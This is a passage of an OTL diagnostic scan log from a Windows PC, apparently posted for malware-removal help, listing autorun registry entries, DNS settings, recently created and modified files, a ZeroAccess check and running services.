O16 - DPF: {16095503-786F-4097-AED6-5D567A26D760} http://www.sis.com/o...utodetectNT.cab (SiS_OCX Control)
O16 - DPF: {44990B00-3C9D-426D-81DF-AAB636FA4345} https://www-secure.s...abs/tgctlcm.cab (Reg Error: Key error.)
O16 - DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} http://fpdownload.ma...r/ultrashim.cab (Reg Error: Key error.)
O16 - DPF: {CF40ACC5-E1BB-4AFF-AC72-04C2F616BCA7} http://www.adobe.com...obat/nos/gp.cab (get_atlcom Class)
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} http://ccfiles.creat...13/CTPIDPDE.cab (Creative Software AutoUpdate Support Package 2)
O16 - DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} http://ccfiles.creat...015/CTSUEng.cab (Creative Software AutoUpdate 2)
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} http://ccfiles.creat...21022/CTPID.cab (Creative Software AutoUpdate Support Package)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.10.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{78665C2D-46DF-4788-BFC2-B06EFD46D2C3}: NameServer = 208.67.222.222,208.67.220.220
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{9AF3476A-ABC9-4638-B175-8F534F2EE741}: DhcpNameServer = 192.168.9.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{B0239C4C-5501-4BF0-9987-C91B97BE81B2}: DhcpNameServer = 192.168.10.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{B0239C4C-5501-4BF0-9987-C91B97BE81B2}: NameServer = 208.67.222.222,208.67.220.220
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{BBBE3A5C-8D11-413B-B0EC-06F6820506B2}: DhcpNameServer = 208.67.222.222
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{C58FCDCC-8EF4-4894-889D-9FA33975FDF8}: DhcpNameServer = 209.251.153.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{C58FCDCC-8EF4-4894-889D-9FA33975FDF8}: NameServer = 208.67.222.222,208.67.220.220
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{F98C21FD-E6F5-4F6A-9252-FBF3C3E6338A}: DhcpNameServer = 209.251.153.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{F98C21FD-E6F5-4F6A-9252-FBF3C3E6338A}: NameServer = 208.67.222.222,208.67.220.220
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation)
O20 - Winlogon\Notify\!SASWinLogon: DllName - (C:\Program Files\SUPERAntiSpyware\SASWINLO.DLL) - C:\Program Files\SUPERAntiSpyware\SASWINLO.DLL (SUPERAntiSpyware.com)
O24 - Desktop WallPaper: D:\My Documents\bettiedesk.bmp
O24 - Desktop BackupWallPaper: D:\My Documents\bettiedesk.bmp
O28 - HKLM ShellExecuteHooks: {5AE067D3-9AFB-48E0-853A-EBB7F4A000DA} - C:\Program Files\SUPERAntiSpyware\SASSEH.DLL (SuperAdBlocker.com)
O28 - HKLM ShellExecuteHooks: {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2006/09/18 17:43:36 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]
O32 - AutoRun File - [2000/12/18 09:44:14 | 000,000,081 | ---- | M] () - F:\AUTOEXEC.BAT -- [ NTFS ]
O33 - MountPoints2\{0364bdc2-a25d-11df-a13c-001c2528d4ad}\Shell - "" = AutoRun
O33 - MountPoints2\{0364bdc2-a25d-11df-a13c-001c2528d4ad}\Shell\AutoRun\command - "" = M:\LaunchU3.exe -a
O33 - MountPoints2\{be0ba5ee-65d0-11e0-a473-00080e7997e3}\Shell - "" = AutoRun
O33 - MountPoints2\{be0ba5ee-65d0-11e0-a473-00080e7997e3}\Shell\AutoRun\command - "" = J:\CTRun\Start.EXE
O33 - MountPoints2\{fa47b680-5eb2-11e0-9cf4-001c2528d4ad}\Shell - "" = AutoRun
O33 - MountPoints2\{fa47b680-5eb2-11e0-9cf4-001c2528d4ad}\Shell\AutoRun\command - "" = K:\LaunchU3.exe -a
O34 - HKLM BootExecute: (autocheck autochk *)
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
 
NetSvcs: FastUserSwitchingCompatibility -  File not found
NetSvcs: Ias - C:\Windows\System32\ias.dll (Microsoft Corporation)
NetSvcs: Nla -  File not found
NetSvcs: Ntmssvc -  File not found
NetSvcs: NWCWorkstation -  File not found
NetSvcs: Nwsapagent -  File not found
NetSvcs: SRService -  File not found
NetSvcs: WmdmPmSp -  File not found
NetSvcs: LogonHours -  File not found
NetSvcs: PCAudit -  File not found
NetSvcs: helpsvc -  File not found
NetSvcs: uploadmgr -  File not found
 
CREATERESTOREPOINT
Restore point Set: OTL Restore Point
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/05/20 14:02:25 | 000,000,000 | ---D | C] -- C:\Windows\ERUNT
[2014/05/20 13:54:04 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2014/05/20 13:16:11 | 000,536,576 | ---- | C] (SQLite Development Team) -- C:\Windows\System32\sqlite3.dll
[2014/05/20 13:14:02 | 001,016,261 | ---- | C] (Thisisu) -- C:\Users\Ken\Desktop\JRT.exe
[2014/05/20 08:34:41 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Ken\Desktop\OTL.exe
[2014/05/19 22:07:25 | 000,000,000 | ---D | C] -- C:\Users\Ken\AppData\Roaming\Oracle
[2014/05/19 22:07:05 | 000,000,000 | ---D | C] -- C:\Windows\Sun
[2014/05/19 22:06:26 | 000,000,000 | ---D | C] -- C:\ProgramData\Oracle
[2014/05/19 22:05:35 | 000,264,616 | ---- | C] (Oracle Corporation) -- C:\Windows\System32\javaws.exe
[2014/05/19 22:05:24 | 000,175,528 | ---- | C] (Oracle Corporation) -- C:\Windows\System32\javaw.exe
[2014/05/19 22:05:24 | 000,175,016 | ---- | C] (Oracle Corporation) -- C:\Windows\System32\java.exe
[2014/05/19 22:05:24 | 000,094,632 | ---- | C] (Oracle Corporation) -- C:\Windows\System32\WindowsAccessBridge.dll
[2014/05/19 22:05:24 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
[2014/05/19 20:16:10 | 000,000,000 | ---D | C] -- C:\Users\Ken\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
[2014/05/19 12:37:29 | 000,000,000 | ---D | C] -- C:\aa8e0b99a77696e8ab0e55
[2014/05/19 12:09:02 | 000,000,000 | ---D | C] -- C:\Windows\Migration
[2014/05/19 12:02:31 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\DESIGNER
[2014/05/19 11:52:08 | 000,000,000 | ---D | C] -- C:\Windows\System32\MRT
[2014/05/19 11:50:15 | 000,176,640 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieui.dll
[2014/05/19 11:50:14 | 000,065,024 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\jsproxy.dll
[2014/05/19 11:50:13 | 000,607,744 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\msfeeds.dll
[2014/05/19 11:50:13 | 000,142,848 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieUnatt.exe
[2014/05/19 11:50:11 | 001,806,848 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\jscript9.dll
[2014/05/19 11:50:11 | 000,231,936 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\url.dll
[2014/05/19 11:50:09 | 001,427,968 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\inetcpl.cpl
[2014/05/19 11:34:56 | 002,382,848 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\mshtml.tlb
[2014/05/19 11:14:31 | 000,025,472 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\drivers\hidparse.sys
[2014/05/19 11:14:18 | 000,024,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\cryptdlg.dll
[2014/05/19 11:14:03 | 000,135,168 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\cscript.exe
[2014/05/19 11:14:03 | 000,036,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\wshcon.dll
[2014/05/19 11:13:59 | 000,812,544 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\certutil.exe
[2014/05/19 11:13:58 | 000,041,984 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\certenc.dll
[2014/05/19 11:12:19 | 001,172,480 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\d3d10warp.dll
[2014/05/19 11:12:19 | 000,486,400 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\d3d10level9.dll
[2014/05/19 11:12:19 | 000,219,648 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\d3d10_1core.dll
[2014/05/19 11:12:18 | 001,029,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\d3d10.dll
[2014/05/19 11:12:18 | 000,683,008 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\d2d1.dll
[2014/05/19 11:12:18 | 000,189,952 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\d3d10core.dll
[2014/05/19 11:12:18 | 000,160,768 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\d3d10_1.dll
[2014/05/19 11:12:17 | 001,069,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\DWrite.dll
[2014/05/19 11:12:15 | 003,603,904 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ntkrnlpa.exe
[2014/05/19 11:12:14 | 003,551,680 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ntoskrnl.exe
[2014/05/19 11:11:55 | 001,548,288 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\WMVDECOD.DLL
[2014/05/19 11:11:53 | 000,037,376 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\cdd.dll
[2014/05/19 11:11:52 | 000,293,376 | ---- | C] (Adobe Systems Incorporated) -- C:\Windows\System32\atmfd.dll
[2014/05/19 11:11:51 | 000,034,304 | ---- | C] (Adobe Systems) -- C:\Windows\System32\atmlib.dll
[2014/05/19 11:11:50 | 000,596,480 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\FWPUCLNT.DLL
[2014/05/19 11:11:48 | 002,050,560 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\win32k.sys
[2014/05/19 11:11:45 | 000,226,304 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\drivers\usbport.sys
[2014/05/19 11:11:45 | 000,006,016 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\drivers\usbd.sys
[2014/05/19 11:11:39 | 000,102,608 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\PresentationCFFRasterizerNative_v0300.dll
[2014/05/19 11:11:34 | 001,304,064 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\WMALFXGFXDSP.dll
[2014/05/19 11:11:34 | 000,335,360 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\SysFxUI.dll
[2014/05/19 11:11:34 | 000,167,936 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\drivers\portcls.sys
[2014/05/19 11:11:34 | 000,130,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\drivers\drmk.sys
[2014/05/19 11:11:25 | 000,037,376 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\printcom.dll
[2014/05/19 11:11:24 | 000,505,344 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\qedit.dll
[2014/05/19 10:59:12 | 000,876,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\wer.dll
[2014/05/19 10:59:05 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\tzres.dll
[2014/05/19 10:45:52 | 000,000,000 | ---D | C] -- C:\Users\Ken\AppData\Roaming\DropboxMaster
[2014/05/19 10:36:53 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TRENDnet
[2014/05/19 10:36:52 | 000,430,080 | ---- | C] (Realtek) -- C:\Windows\SwUSB.exe
[2014/05/19 10:36:52 | 000,025,896 | ---- | C] (Windows ® Codename Longhorn DDK provider) -- C:\Windows\System32\drivers\RtlProt.sys
[2014/05/19 10:36:49 | 001,957,448 | ---- | C] (Realtek Semiconductor Corporation                           ) -- C:\Windows\System32\drivers\RTWlanU.sys
[2014/05/19 10:36:49 | 000,000,000 | ---D | C] -- C:\Program Files\TRENDnet
[3 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]
[3 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2014/05/20 14:05:26 | 000,642,740 | ---- | M] () -- C:\Windows\System32\perfh009.dat
[2014/05/20 14:05:26 | 000,119,932 | ---- | M] () -- C:\Windows\System32\perfc009.dat
[2014/05/20 13:59:53 | 000,000,882 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/05/20 13:59:06 | 000,003,168 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
[2014/05/20 13:59:06 | 000,003,168 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
[2014/05/20 13:58:52 | 000,067,584 | ---- | M] () -- C:\Windows\bootstat.dat
[2014/05/20 13:58:48 | 3220,758,528 | -HS- | M] () -- C:\hiberfil.sys
[2014/05/20 13:57:49 | 000,031,568 | ---- | M] () -- C:\Windows\System32\BMXStateBkp-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/20 13:57:49 | 000,031,568 | ---- | M] () -- C:\Windows\System32\BMXState-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/20 13:57:49 | 000,029,820 | ---- | M] () -- C:\Windows\System32\BMXCtrlState-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/20 13:57:49 | 000,029,820 | ---- | M] () -- C:\Windows\System32\BMXBkpCtrlState-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/20 13:57:49 | 000,011,564 | ---- | M] () -- C:\Windows\System32\DVCState-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/20 13:57:00 | 000,000,886 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/05/20 13:53:00 | 001,326,389 | ---- | M] () -- C:\Users\Ken\Desktop\AdwCleaner.exe
[2014/05/20 13:14:26 | 001,016,261 | ---- | M] (Thisisu) -- C:\Users\Ken\Desktop\JRT.exe
[2014/05/20 08:28:38 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Ken\Desktop\OTL.exe
[2014/05/19 22:56:51 | 000,000,266 | ---- | M] () -- C:\Windows\tasks\AutoKMS.job
[2014/05/19 22:12:12 | 000,692,400 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\System32\FlashPlayerApp.exe
[2014/05/19 22:12:12 | 000,070,832 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\System32\FlashPlayerCPLApp.cpl
[2014/05/19 22:05:13 | 000,094,632 | ---- | M] (Oracle Corporation) -- C:\Windows\System32\WindowsAccessBridge.dll
[2014/05/19 22:05:11 | 000,264,616 | ---- | M] (Oracle Corporation) -- C:\Windows\System32\javaws.exe
[2014/05/19 22:05:11 | 000,175,528 | ---- | M] (Oracle Corporation) -- C:\Windows\System32\javaw.exe
[2014/05/19 22:05:10 | 000,175,016 | ---- | M] (Oracle Corporation) -- C:\Windows\System32\java.exe
[2014/05/19 21:18:40 | 000,000,275 | ---- | M] () -- C:\Windows\wininit.ini
[2014/05/19 20:35:59 | 000,431,917 | ---- | M] () -- C:\Windows\System32\drivers\etc\HOSTS
[2014/05/19 20:20:10 | 000,945,568 | ---- | M] () -- C:\Windows\System32\drivers\etc\HOSTS.bak
[2014/05/19 20:16:10 | 000,001,061 | ---- | M] () -- C:\Users\Ken\Desktop\Revo Uninstaller.lnk
[2014/05/19 12:45:42 | 003,162,278 | ---- | M] () -- C:\Windows\{00000000-00000000-0000000D-00001102-00000004-00511102}.CDF
[2014/05/19 12:45:42 | 003,162,278 | ---- | M] () -- C:\Windows\{00000000-00000000-0000000D-00001102-00000004-00511102}.BAK
[2014/05/19 12:43:20 | 000,381,216 | ---- | M] () -- C:\Windows\System32\FNTCACHE.DAT
[2014/05/19 12:40:12 | 000,001,080 | ---- | M] () -- C:\Windows\System32\settingsbkup.sfm
[2014/05/19 12:40:12 | 000,001,080 | ---- | M] () -- C:\Windows\System32\settings.sfm
[2014/05/19 12:39:10 | 000,445,016 | ---- | M] (Creative Labs) -- C:\Windows\System32\wrap_oal.dll
[2014/05/19 12:39:10 | 000,109,144 | ---- | M] (Portions © Creative Labs Inc. and NVIDIA Corp.) -- C:\Windows\System32\OpenAL32.dll
[2014/05/19 12:39:09 | 000,000,087 | RH-- | M] () -- C:\Windows\ctfile.rfc
[2014/05/19 12:06:34 | 000,002,057 | ---- | M] () -- C:\Windows\epplauncher.mif
[2014/05/19 11:20:19 | 000,001,975 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2014/05/19 10:46:11 | 000,000,953 | ---- | M] () -- C:\Users\Ken\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
[2014/05/19 10:45:36 | 000,000,917 | ---- | M] () -- C:\Users\Ken\Desktop\Dropbox.lnk
[2014/05/19 10:36:53 | 000,001,810 | ---- | M] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Wireless Configuration Utility.lnk
[2014/05/19 10:36:53 | 000,001,792 | ---- | M] () -- C:\Users\Public\Desktop\Wireless Configuration Utility.lnk
[2014/05/05 19:14:12 | 002,382,848 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\mshtml.tlb
[3 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]
[3 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2014/05/20 13:53:38 | 001,326,389 | ---- | C] () -- C:\Users\Ken\Desktop\AdwCleaner.exe
[2014/05/19 21:18:39 | 000,000,275 | ---- | C] () -- C:\Windows\wininit.ini
[2014/05/19 12:45:34 | 003,162,278 | ---- | C] () -- C:\Windows\{00000000-00000000-0000000D-00001102-00000004-00511102}.BAK
[2014/05/19 12:45:31 | 003,162,278 | ---- | C] () -- C:\Windows\{00000000-00000000-0000000D-00001102-00000004-00511102}.CDF
[2014/05/19 12:40:12 | 000,029,820 | ---- | C] () -- C:\Windows\System32\BMXBkpCtrlState-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/19 12:40:12 | 000,011,564 | ---- | C] () -- C:\Windows\System32\DVCState-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/19 12:40:12 | 000,001,080 | ---- | C] () -- C:\Windows\System32\settingsbkup.sfm
[2014/05/19 12:40:12 | 000,001,080 | ---- | C] () -- C:\Windows\System32\settings.sfm
[2014/05/19 11:11:50 | 000,218,228 | ---- | C] () -- C:\Windows\System32\WFP.TMF
[2014/05/19 10:36:53 | 000,001,810 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Wireless Configuration Utility.lnk
[2014/05/19 10:36:53 | 000,001,792 | ---- | C] () -- C:\Users\Public\Desktop\Wireless Configuration Utility.lnk
[2014/05/19 10:36:52 | 000,036,864 | ---- | C] () -- C:\Windows\runSW.exe
[2011/04/13 09:54:46 | 000,000,000 | ---- | C] () -- C:\Users\Ken\AppData\Roaming\wklnhst.dat
[2010/12/20 22:50:46 | 014,835,712 | ---- | C] () -- C:\ProgramData\sandra.mda
[2010/09/19 03:06:28 | 000,001,356 | ---- | C] () -- C:\Users\Ken\AppData\Local\d3d9caps.dat
[2009/02/04 01:21:42 | 000,000,000 | ---- | C] () -- C:\ProgramData\LauncherAccess.dt
[2008/01/09 20:34:03 | 000,817,982 | ---- | C] () -- C:\ProgramData\LUUnInstall.LiveUpdate
[2008/01/02 18:37:37 | 000,000,132 | ---- | C] () -- C:\Users\Ken\BackupResult.DAT
[2008/01/02 17:50:03 | 000,004,608 | ---- | C] () -- C:\Users\Ken\Drive_K.BJF
[2007/12/05 11:52:50 | 000,141,824 | ---- | C] () -- C:\Users\Ken\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2007/12/04 11:33:31 | 007,602,176 | ---- | C] () -- C:\Users\Ken\NTUSER.bak
 
========== ZeroAccess Check ==========
 
[2006/11/02 08:54:22 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/03/25 09:26:04 | 011,587,584 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2009/04/11 02:28:19 | 000,614,912 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
"" = %systemroot%\system32\wbem\wbemess.dll -- [2009/04/11 02:28:25 | 000,347,648 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
========== Custom Scans ==========
 
========== Base Services ==========
SRV - [2006/11/02 05:46:02 | 000,024,576 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\aelupsvc.dll -- (AeLookupSvc)
SRV - [2008/01/19 03:33:43 | 000,033,280 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\appinfo.dll -- (Appinfo)
SRV - [2008/01/19 03:33:01 | 000,059,392 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\alg.exe -- (ALG)
SRV - [2009/04/11 02:28:23 | 000,758,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\qmgr.dll -- (BITS)
SRV - [2009/04/11 02:28:18 | 000,334,848 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\BFE.DLL -- (BFE)
SRV - [2011/11/16 10:12:25 | 000,009,728 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\lsass.exe -- (KeyIso)
SRV - [2009/04/11 02:28:19 | 000,268,800 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\es.dll -- (EventSystem)
SRV - [2008/01/19 03:33:49 | 000,081,920 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\browser.dll -- (Browser)
SRV - [2013/07/08 00:16:55 | 000,133,120 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\cryptsvc.dll -- (CryptSvc)
SRV - [2009/04/11 02:28:24 | 000,550,400 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\rpcss.dll -- (DcomLaunch)
SRV - [2009/04/11 02:28:18 | 000,204,288 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\dhcpcsvc.dll -- (Dhcp)
SRV - [2011/03/02 11:44:27 | 000,086,528 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\System32\dnsrslvr.dll -- (Dnscache)
SRV - [2008/01/19 03:34:08 | 000,057,344 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\eapsvc.dll -- (EapHost)
SRV - [2009/04/11 02:28:19 | 000,026,112 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\hidserv.dll -- (hidserv)
SRV - [2008/01/19 03:34:34 | 000,288,256 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\System32\ipnathlp.dll -- (SharedAccess)
SRV - [2009/04/11 02:28:20 | 000,364,032 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\IPSECSVC.DLL -- (PolicyAgent)
SRV - [2014/03/11 10:13:24 | 000,022,216 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV - [2014/03/11 10:13:24 | 000,279,776 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV - [2009/04/11 02:28:24 | 000,311,808 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\swprv.dll -- (swprv)
SRV - [2008/01/19 03:34:49 | 000,045,056 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\mmcss.dll -- (MMCSS)
SRV - [2008/01/19 03:35:36 | 000,274,432 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\netman.dll -- (Netman)
SRV - [2008/01/19 03:35:36 | 000,237,056 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\netprofm.dll -- (netprofm)
SRV - [2008/01/19 03:35:38 | 000,168,448 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\nlasvc.dll -- (NlaSvc)
SRV - [2008/01/19 03:35:57 | 000,018,432 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\nsisvc.dll -- (nsi)
SRV - [2009/04/11 02:28:25 | 000,222,720 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\umpnpmgr.dll -- (PlugPlay)
SRV - [2010/08/17 10:11:37 | 000,128,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\spoolsv.exe -- (Spooler)
SRV - [2011/11/16 10:12:25 | 000,009,728 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\lsass.exe -- (ProtectedStorage)
SRV - [2009/04/11 02:28:19 | 000,564,224 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\emdmgmt.dll -- (EMDMgmt)
SRV - [2008/01/19 03:36:15 | 000,090,624 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\rasauto.dll -- (RasAuto)
SRV - [2009/04/11 02:28:24 | 000,262,144 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\rasmans.dll -- (RasMan)
SRV - [2009/04/11 02:28:24 | 000,550,400 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\rpcss.dll -- (RpcSs)
SRV - [2008/01/19 03:36:20 | 000,019,968 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\seclogon.dll -- (seclogon)
SRV - [2011/11/16 10:12:25 | 000,009,728 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\lsass.exe -- (SamSs)
SRV - [2009/04/11 02:28:26 | 000,061,440 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\wscsvc.dll -- (wscsvc)
SRV - [2010/09/06 12:20:29 | 000,125,952 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\srvsvc.dll -- (LanmanServer)
SRV - [2009/07/10 07:47:42 | 000,247,808 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\shsvcs.dll -- (ShellHWDetection)
SRV - [2009/04/11 02:27:49 | 003,408,896 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\SLsvc.exe -- (slsvc)
SRV - [2010/11/04 14:55:12 | 000,601,600 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\schedsvc.dll -- (Schedule)
SRV - [2009/04/11 02:28:24 | 000,242,688 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\tapisrv.dll -- (TapiSrv)
SRV - [2009/07/10 07:47:42 | 000,247,808 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\shsvcs.dll -- (Themes)
SRV - [2009/04/11 02:28:23 | 000,153,088 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\profsvc.dll -- (ProfSvc)
